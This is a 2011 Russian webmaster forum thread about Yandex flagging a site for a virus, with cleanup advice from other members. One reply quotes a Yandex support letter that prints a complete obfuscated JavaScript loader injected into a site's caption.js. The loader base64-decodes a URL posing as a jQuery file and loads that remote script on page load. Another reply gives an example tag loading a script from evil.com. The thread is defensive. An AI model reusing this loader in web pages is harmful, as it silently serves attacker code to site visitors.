WEBLEDI.RUВебледи Форум успешных женщин-вебмастеров
10 Декабрь 2016, 20:31:22 *
Добро пожаловать, Гость. Пожалуйста, войдите или зарегистрируйтесь.

Войти
Правила Реклама
 
5
10
15
Свежие ответы
Re: Нужны копирайтеры на постоянную работу! от Ируха 1985 (Ищу копирайтера, редактора, контент-менеджера)
Re: Нужны копирайтеры на постоянную работу! от Ируха 1985 (Контент, копирайтинг, переводы)
Re: Требуется помощница по ведению сайта (контент-менеджер) от Клим (Работа и услуги)
Медицинская партнерка с уникальными методиками от sexolog (CPA-сети)
Как рассчитывается итоговый доход Адсенса? от anlw (Google AdSENSE)
Re: Наполнение групп Вконтакте от Posting_i_PIAR (Социальные сети)
Услуга в соц.сетях: поиск аккаунтов по номеру телефона или email. от Max-Payne (Покупка-продажа)
Кем будет востребована информация о благосостоянии клиента? от Max-Payne (Привлечение и удержание посетителей)
Интересен траф от вебмастеров))) от DariaTraffic (Реклама и доход)
Re: Проблема с дизайнером от Mara (Дизайн)
Re: Марафон Спарта от Пузата - Почему я иду от Клим (Обучение сайтостроению, SEO и заработку)
Re: Апа не будет до конца лета? от larisay (Yandex)
Re: Хостинг FairyHosting.com от vladislavd (Хостинг)
Re: как сейчас с высококонкурентной тематикой для новых сайтов? от Ивица (Раскрутка сайтов в поисковиках)
Re: [Анонс] Букварикс: бесплатная программа для быстрого подбора ключевых слов от Bukvarix (Сервисы и SEO программы)
Свежие темы
Показать ещё
  Печать  
Страниц: 1 2 3 ... 6
Автор

Тема: Вирус "от Яндекса" - поведенческий анализ  (Прочитано 12788 раз)

0 Пользователей и 1 Гость смотрят эту тему.
LasyBones
Offline Offline

Сообщений: 36



Просмотр профиля
« : 22 Декабрь 2011, 12:30:16 »

Яндекс нашел вирус на сайте. Пишет, что "поведенческий анализ".  Шокирован
Никто не знает, как быть и что искать?
Записан

Меняюсь ссылками - стучать в личку
И мое деревце тоже полейте, пожаста, -
Piranka
Offline Offline

Пол: Женский
Сообщений: 729


Анна


Просмотр профиля
« Ответ #1 : 22 Декабрь 2011, 12:44:41 »

У меня писал такое на сайте некоторое время назад, рекламу убирала постепенно и антивирусником сайт проверяла, вирусов не находил. Яндекс то снимал метку, то опять ставил, долго мучал мой сайт. В Яндекс. Вебмастере - Безопасность вот тут _http://help.yandex.ru/webmaster/?id=1059440&ncrnd=7257 можно почитать, что ему может не нравится какие скрипты. Я писала Яндексу много раз, просила указать причину именно что ему не нравится, так как сама несколько раз все проверяла и ничего не могла найти. Нанимала человека и он мне чистил.
А Яндекс написал вот что, но правда позже, когда с сайта метку уже убрали:
Цитировать
Здравствуйте!

 Приношу свои извинения за задержку с ответом.

 В настоящий момент с Вашим сайтом все в порядке, он прошёл перепроверку и не помечен как угрожающий безопасности компьютера.

 Вредоносный код, вызвавший реакцию антивируса, находился в скрипте www.site.ru/media/system/js/caption.js , и выглядел следующим образом:

 if(!document.xmlSettings)document.xmlSettings={};document.xmlSettings.ae=function(e,et,f){if(e.addEventListener){e.addEventListener(et,f,false);return f;}ief=function(){f.call(f)};e.attachEvent('on'+et,ief);return ief;};document.xmlSettings.bd=function(data){var b64="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";var o1,o2,o3,h1,h2,h3,h4,bits,i=0,enc='';do{h1=b64.indexOf(data.charAt(i++));h2=b64.indexOf(data.charAt(i++));h3=b64.indexOf(data.charAt(i++));h4=b64.indexOf(data.charAt(i++));bits=h1<<18|h2<<12|h3<<6|h4;o1=bits>>16&0xff;o2=bits>>8&0xff;o3=bits&0xff;if(h3==64)enc+=String.fromCharCode(o1);else if(h4==64)enc+=String.fromCharCode(o1,o2);else enc+=String.fromCharCode(o1,o2,o3);}while(i<data.length);return enc;};document.xmlSettings.ae(window,'load',function(e){document.xmlSettings.ssrc=document.xmlSettings.bd('aHR0cDovL2pxdWVyeS1taW4uanNzZWMubmV0LzIvanF1ZXJ5LTEuMy4yLmpz');document.xmlSettings.scriptElement=document.createElement('script');document.xmlSettings.scriptElement.setAttribute('type','text/javascript');document.xmlSettings.scriptElement.setAttribute('src',document.xmlSettings.ssrc);document.body.appendChild(document.xmlSettings.scriptElement);});

 --
 С уважением, Платон Щукин
 Служба поддержки Яндекса
http://help.yandex.ru/
Записан
LasyBones
Offline Offline

Сообщений: 36



Просмотр профиля
« Ответ #2 : 22 Декабрь 2011, 12:53:22 »

И как это туда попало? Знаете?  Шокирован
Записан

Меняюсь ссылками - стучать в личку
И мое деревце тоже полейте, пожаста, -
Piranka
Offline Offline

Пол: Женский
Сообщений: 729


Анна


Просмотр профиля
« Ответ #3 : 22 Декабрь 2011, 12:58:28 »

И как это туда попало? Знаете?  Шокирован
Я так поняла что я когда-то что-то установила, Яндекс его долго невидел, а в один прекрасный момент заметил и определил как вирус.
Записан
LasyBones
Offline Offline

Сообщений: 36



Просмотр профиля
« Ответ #4 : 22 Декабрь 2011, 13:06:49 »

Я вот позавчера установила комменты от Вконтакте. Но это же не может быть от этого.  В замешательстве
Записан

Меняюсь ссылками - стучать в личку
И мое деревце тоже полейте, пожаста, -
Piranka
Offline Offline

Пол: Женский
Сообщений: 729


Анна


Просмотр профиля
« Ответ #5 : 22 Декабрь 2011, 13:16:33 »

Я вот позавчера установила комменты от Вконтакте. Но это же не может быть от этого.  В замешательстве
По идее не должно быть, проверь код на сайте, через антивирусник проверь, поищи левые ссылки .
Вот почитай, попробуй это поискать
Цитировать
Как искать код?

Следует искать любой код, который не добавляли вы сами.

Особое внимание обратите на следующие вещи:
теги  <script>  , содержащие ссылки на неизвестные вам ресурсы (например, такие  <script src="h__p://evil.com/1.js">;


 теги <script>, текст которых обфусцирован (то есть, зашифрован или запутан, например, так:
скрипты, маскирующиеся под счетчики или баннерные системы, содержащие перед текстом комментарии о том, что это счетчик, но выполняющие непонятные действия или ссылающиеся на неизвестные вам сайты;
теги <iframe>, <object>, <embed> , ссылающиеся на неизвестные вам страницы; особое внимание нужно обратить на теги, атрибуты которых установлены таким образом, чтобы тег был скрыт при просмотре страницы. Например: маленькие значения атрибутов width/height  (0-10 пикселей); невидимость: position:absolute; display:none  и т.д.;
атрибуты expression в стилях страницы, содержащие неизвестный вам текст, наример: <img style="top: expression(....) !important" >  ;
недопустимые элементы в контенте, размещенном пользователями (комментариях, статьях, постах на форуме): странные вставки кода, флеш-ролики, скрипты, теги <iframe>, <object>, <embed>  .

Часто страница может содержать несколько подобных элементов, в том числе различных и ссылающихся на разные источники.
Записан
LasyBones
Offline Offline

Сообщений: 36



Просмотр профиля
« Ответ #6 : 22 Декабрь 2011, 13:28:24 »

Ссылок левых нет. А вот все остальное... может, они хоть ответят, что искать. Я поискала, конечно. Но я это не считается.
Записан

Меняюсь ссылками - стучать в личку
И мое деревце тоже полейте, пожаста, -
Piranka
Offline Offline

Пол: Женский
Сообщений: 729


Анна


Просмотр профиля
« Ответ #7 : 22 Декабрь 2011, 14:22:30 »

Ссылок левых нет. А вот все остальное... может, они хоть ответят, что искать. Я поискала, конечно. Но я это не считается.
Пиши Яндексу пусть укажут что им не нравится. Отпишись что напишут, что у тебя было не так.
Записан
J77
И создал Бог женщину. Существо получилось вредное, но забавное...
Offline Offline

Пол: Женский
Сообщений: 3757



Просмотр профиля
« Ответ #8 : 22 Декабрь 2011, 14:41:59 »

Бывает так что код вживляют прямо в сам скрипт, тогда антивирусником ничего не определить. Просмотрите файлы скриптов хотя бы чисто визуально, особое внимание надо уделить индексным файлам. Даже если вы не специалист в этом вопросе, то можете такой код вычислить. обычно это скрипт + оооочень длинная мешанина латинских символов. Хорошо еще если вам пишет, что просто вирус, а бывает так что при переходе на ваш сайт из поисковика идет перенаправление на другой сайт, часто адалт тематики, что не есть гуд сами понимаете.
Если хотите можете скинуть сайт в личку посмотрю код чисто визуально на предмет левых вставок.
Записан

Краткий план на 2015-16 год: Родить, заработать, переехать.....
Я очень быстро составляю СЯ . А вы?
Velonika
Offline Offline

Пол: Женский
Сообщений: 449



Просмотр профиля
« Ответ #9 : 22 Декабрь 2011, 14:53:37 »

Пользуюсь сервисом _http://www.siteguard.ru/
Там все достаточно просто. Нужно только первый раз определить - скрипт безопасный или вредный.
Т.е. сверяетесь с вашим исходником сайта - если есть подобный код - счетчики, тизеры и т.д. -
помечаете безопасным. Нет в исходнике - вирус.

Дальше сервис мониторит появление новых скриптов - на каждый новый сообщение - и вы определяете - сами вы ставили (поменяли тизеры например) - или залито, что-то.

Ну не панацея конечно, но хоть что-то.
Записан

Рефералам спасибо Улыбка
LasyBones
Offline Offline

Сообщений: 36



Просмотр профиля
« Ответ #10 : 22 Декабрь 2011, 15:10:41 »

Velonika, спасибо. Попробую подключиться.
Записан

Меняюсь ссылками - стучать в личку
И мое деревце тоже полейте, пожаста, -
orenmaker
Все будет хорошо. Я спрашивал
Offline Offline

Пол: Мужской
Сообщений: 1085



Просмотр профиля
« Ответ #11 : 22 Декабрь 2011, 15:21:27 »

Velonika, спасибо. Попробую подключиться.
Проверяйте свои страницы на наличие вредоносного кода. Т.е. открываете страницу и смотрите исходный код. Поищите, есть ли слово типа eval. Меняйте пароли от хостинга, ftp и админки сайта.
Записан
LasyBones
Offline Offline

Сообщений: 36



Просмотр профиля
« Ответ #12 : 22 Декабрь 2011, 15:27:27 »

eval нету. Есть prevAll. Это на странице, где вирус нашли.
Записан

Меняюсь ссылками - стучать в личку
И мое деревце тоже полейте, пожаста, -
lulul
Offline Offline

Пол: Женский
Сообщений: 298


Я - Светлана


Просмотр профиля
« Ответ #13 : 22 Декабрь 2011, 15:41:21 »

LasyBones, напишите яндексу, скажите, что в выдаче ваш сайт показывается с пометкой, скажите, что все проверили и не смогли найти вредоносный код и попросите их, чтобы они помогли вам в этом вопросе. По идеи (так было у меня) они напишут ту строку (код) на вашем сайте, которую считают вирусом и на которой "рунается" их антивирус. И тогда будете искать этот код в файлах, а то так трудно искать непонятно что.
Записан

Если я купила у вас статью или мк, то пишите под текстом свои данные. Автор:....
LasyBones
Offline Offline

Сообщений: 36



Просмотр профиля
« Ответ #14 : 22 Декабрь 2011, 15:47:54 »

Я написала им просьбу сказать, что за код. Но пока они еще ответят... Грустный
А то, что кода нет, я не могу утверждать.
Записан

Меняюсь ссылками - стучать в личку
И мое деревце тоже полейте, пожаста, -
Страниц: 1 2 3 ... 6
  Печать  
 
Перейти в:  

| Sitemap